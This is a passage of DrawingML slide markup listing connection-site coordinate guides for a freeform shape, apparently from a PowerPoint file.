              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375506 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5344297 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375506 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5344297 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4858827 h 6858000"/>
